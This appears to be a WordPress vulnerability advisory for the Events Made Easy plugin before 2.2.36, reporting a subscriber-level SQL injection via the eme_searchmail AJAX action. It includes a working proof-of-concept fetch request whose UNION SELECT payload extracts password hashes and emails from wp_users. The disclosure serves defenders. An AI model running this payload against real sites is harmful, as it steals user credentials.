WordPress Plugin Vulnerabilities
Events Made Easy < 2.2.36 - Subscriber+ SQL Injection
Description
The plugin does not sanitise and escape the search_text parameter before using it in a SQL statement via the eme_searchmail AJAX action, available to any authenticated users. As a result, users with a role as low as subscriber can call it and perform SQL injection attacks
Proof of Concept
fetch("https://example.com/wp-admin/admin-ajax.php", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "body": new URLSearchParams({"action":"eme_searchmail","search_text": "') union select 1,1,1,1,1,user_pass,user_email,1,1,1,1,1,1,1,1,1,1,1,1 from wp_users -- g"}), "method": "POST", "credentials": "include" }) .then(response => response.text()) .then(data => console.log(data));
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-12-06 (about 2 years ago)
Added
2021-12-06 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)